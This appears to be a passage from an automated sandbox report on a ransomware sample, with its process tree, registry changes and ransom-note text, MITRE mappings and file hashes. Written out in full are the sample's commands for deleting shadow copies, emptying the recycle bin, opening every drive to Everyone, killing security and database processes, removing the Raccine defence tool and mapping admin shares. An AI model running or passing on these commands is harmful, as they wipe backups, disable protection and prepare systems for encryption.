PID 1612 wrote to memory of 772	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1120	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1120	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1120	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1088	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1088	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 1088	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	sc.exe
PID 1612 wrote to memory of 556	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 556	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 556	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	netsh.exe
PID 1612 wrote to memory of 628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 1388	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 1388	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 1388	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 540	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 540	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 540	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe
PID 1612 wrote to memory of 1628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 1628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 1628	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	conhost.exe
PID 1612 wrote to memory of 368	1612	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1612

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:664

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1176

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:1104

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:972

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1476

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:984

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:960

C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:1180

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1164

C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:888

C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1608

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1324

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:772

C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:1120

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1088

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:556

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
PID:1388

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
PID:540

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:1628

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:368

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:348

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:1100

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
PID:1652

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
PID:752

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:1672

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
PID:2012

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
PID:1584

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
PID:936

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
PID:1924

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
PID:488

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:488

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:1180

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324

C:\Windows\system32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\system32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1044

C:\Windows\system32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:888

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\Users
2⤵
PID:348

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\A$
2⤵
PID:1192

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\B$
2⤵
PID:1536

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\C$
2⤵
PID:1136

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\D$
2⤵
PID:928

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\E$
2⤵
PID:1604

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\F$
2⤵
PID:588

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\G$
2⤵
PID:1336

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\H$
2⤵
PID:1104

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\I$
2⤵
PID:1548

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\J$
2⤵
PID:1068

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\K$
2⤵
PID:1324

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\L$
2⤵
PID:1608

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\M$
2⤵
PID:488

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\N$
2⤵
PID:1976

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\O$
2⤵
PID:300

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\P$
2⤵
PID:1588

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\Q$
2⤵
PID:1684

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\R$
2⤵
PID:1672

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\S$
2⤵
PID:1688

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\T$
2⤵
PID:436

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\U$
2⤵
PID:664

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\V$
2⤵
PID:1600

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\W$
2⤵
PID:1084

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\X$
2⤵
PID:368

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\Y$
2⤵
PID:936

C:\Windows\system32\net.exe
"net.exe" use \\10.7.0.28\Z$
2⤵
PID:1760

C:\Windows\system32\arp.exe
"arp" -a
2⤵
PID:764

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
2⤵
- Modifies Internet Explorer settings
PID:1608

C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:908

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:1636

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:1992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
2⤵
- Deletes itself
PID:628

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1669784256661124864-928163682-153600650414413536352076759521-1022700475-1961767927"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7141750801525997793-1237853955845561458-932423807-162678959513224757431679442740"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "754007910-21447363361506662874-1862908841-578613061-257075702-10768730192079149915"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-90311304612167672641025801358494010265-258707477-7110595451471934194-1224840377"
1⤵
PID:1628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20167727541913597539-1830300158338243005-1568827909-18226261806989242371799912174"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-520634391193391159-18621397651538637867-777767657-7298653321266893976-979675748"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2024924659-202612311-129114064214739502431885597945-16210099231537405377701496919"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
MD5
6f0d9080f024081060a440f6b4e7b1ff

SHA1
cbba41b89b5954145bd911f9a2c68231232f107e

SHA256
a7b8a2f56e0529a6cf8e6292945919a6358686f6c72f7e60c90807989d396a7c

SHA512
e4b1d12e88b7722102800f7f947f56f79e1bcc8180107254b6a134ba96fdbe47e86e3bb862871c8e455502bcdd7efd4a26c8870290aa543199be5aa7b7da7025

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/348-92-0x0000000000000000-mapping.dmp

Download
memory/368-88-0x0000000000000000-mapping.dmp

Download
memory/488-113-0x0000000000000000-mapping.dmp

Download
memory/488-127-0x0000000000000000-mapping.dmp

Download
memory/520-100-0x0000000000000000-mapping.dmp

Download
memory/540-121-0x0000000000000000-mapping.dmp

Download
memory/540-84-0x0000000000000000-mapping.dmp

Download
memory/556-81-0x0000000000000000-mapping.dmp

Download
memory/588-126-0x0000000000000000-mapping.dmp

Download
memory/628-82-0x0000000000000000-mapping.dmp

Download
memory/664-64-0x0000000000000000-mapping.dmp

Download
memory/752-97-0x0000000000000000-mapping.dmp

Download
memory/764-109-0x0000000000000000-mapping.dmp

Download
memory/772-78-0x0000000000000000-mapping.dmp

Download
memory/820-102-0x0000000000000000-mapping.dmp

Download
memory/884-125-0x0000000000000000-mapping.dmp

Download
memory/888-74-0x0000000000000000-mapping.dmp

Download
memory/928-95-0x0000000000000000-mapping.dmp

Download
memory/936-123-0x0000000000000000-mapping.dmp

Download
memory/936-105-0x0000000000000000-mapping.dmp

Download
memory/960-70-0x0000000000000000-mapping.dmp

Download
memory/972-67-0x0000000000000000-mapping.dmp

Download
memory/984-69-0x0000000000000000-mapping.dmp

Download
memory/1088-80-0x0000000000000000-mapping.dmp

Download
memory/1088-130-0x0000000000000000-mapping.dmp

Download
memory/1092-110-0x0000000000000000-mapping.dmp

Download
memory/1096-94-0x0000000000000000-mapping.dmp

Download
memory/1100-128-0x0000000000000000-mapping.dmp

Download
memory/1100-93-0x0000000000000000-mapping.dmp

Download
memory/1104-66-0x0000000000000000-mapping.dmp

Download
memory/1108-114-0x0000000000000000-mapping.dmp

Download
memory/1112-118-0x0000000000000000-mapping.dmp

Download
memory/1120-79-0x0000000000000000-mapping.dmp

Download
memory/1136-103-0x0000000000000000-mapping.dmp

Download
memory/1164-72-0x0000000000000000-mapping.dmp

Download
memory/1176-65-0x0000000000000000-mapping.dmp

Download
memory/1180-129-0x0000000000000000-mapping.dmp

Download
memory/1180-71-0x0000000000000000-mapping.dmp

Download
memory/1192-115-0x0000000000000000-mapping.dmp

Download
memory/1228-90-0x0000000000000000-mapping.dmp

Download
memory/1324-132-0x00000000022D0000-0x00000000022D1000-memory.dmp

Filesize
4KB

Download
memory/1324-134-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1324-77-0x0000000000000000-mapping.dmp

Download
memory/1324-135-0x00000000023C0000-0x00000000023C1000-memory.dmp

Filesize
4KB

Download
memory/1324-133-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1324-136-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

Filesize
8KB

Download
memory/1324-137-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

Filesize
8KB

Download
memory/1388-83-0x0000000000000000-mapping.dmp

Download
memory/1476-68-0x0000000000000000-mapping.dmp

Download
memory/1476-73-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp

Filesize
8KB

Download
memory/1484-108-0x0000000000000000-mapping.dmp

Download
memory/1536-107-0x0000000000000000-mapping.dmp

Download
memory/1584-104-0x0000000000000000-mapping.dmp

Download
memory/1600-98-0x0000000000000000-mapping.dmp

Download
memory/1608-76-0x0000000000000000-mapping.dmp

Download
memory/1608-122-0x0000000000000000-mapping.dmp

Download
memory/1612-60-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/1612-62-0x0000000000280000-0x0000000000282000-memory.dmp

Filesize
8KB

Download
memory/1628-86-0x0000000000000000-mapping.dmp

Download
memory/1652-96-0x0000000000000000-mapping.dmp

Download
memory/1672-99-0x0000000000000000-mapping.dmp

Download
memory/1688-119-0x0000000000000000-mapping.dmp

Download
memory/1696-111-0x0000000000000000-mapping.dmp

Download
memory/1708-63-0x0000000000000000-mapping.dmp

Download
memory/1748-112-0x0000000000000000-mapping.dmp

Download
memory/1760-89-0x0000000000000000-mapping.dmp

Download
memory/1800-120-0x0000000000000000-mapping.dmp

Download
memory/1808-116-0x0000000000000000-mapping.dmp

Download
memory/1924-106-0x0000000000000000-mapping.dmp

Download
memory/1940-91-0x0000000000000000-mapping.dmp

Download
memory/1956-117-0x0000000000000000-mapping.dmp

Download
memory/2012-101-0x0000000000000000-mapping.dmp

Download
memory/2016-124-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads